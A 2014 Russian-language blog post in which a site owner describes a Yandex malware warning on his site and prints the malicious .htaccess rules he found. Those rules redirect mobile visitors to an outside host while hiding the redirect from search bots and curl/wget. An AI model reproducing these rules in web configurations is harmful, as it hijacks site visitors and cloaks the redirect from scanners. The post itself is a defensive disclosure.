Мобильный зловред в .htaccess

Автор: killoff  | |
6 марта ,
2014

После многочисленных переездов с сервера не сервер, яндекс начал писать мне:

На страницах сайта killoff.ru обнаружен код, который может быть опасен для посетителей. Выполнение этого кода может привести к заражению компьютера опасными программами, использованию его без ведома пользователя, порче или краже данных.

В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

Яндекс никак не оценивает содержание сайта и предупреждает пользователей о том, что сайт мог быть заражен без ведома его владельцев.

Пожалуйста, удалите вредоносный код. Если при новой проверке код не будет обнаружен, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта.

И в пояснении было что это мобильный редирект. После перепроверки сайта опасный код не обнаруживался, но спустя 1-3 недели снова опасный код был обнаружен. Пока сам не увидел с мобильного устройства что сайт действительно не открывается – ничего и не предпринимал. Весь код непонятным для меня образом попал в .htaccess:

RewriteCond %{HTTP_USER_AGENT} (adr|android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]
RewriteRule (.*) http://pda.whiteads.biz/?29&source=killoff.ru [L,R=302] # On

Зловред удален, все файлы двига проверены – ничего опасного на первый взгляд не выявлено больше.

Метки: ,

Запись сделана 6 марта 2014 в 13:05 и размещена в рубрике Разное. Вы можете следить за комментариями через RSS 2.0 фид.
Google Bookmarks Digg Reddit del.icio.us Ma.gnolia Technorati Slashdot Yahoo My Web Memori.ru Mister Wong Агентство Socialink korica.info Ваау! МоёМесто.ru News2.ru БобрДобр.ru feedblog sportexec.info

Комментарии:

Оставить комментарий

WordPress: 8.49MB | MySQL:68 | 0,744sec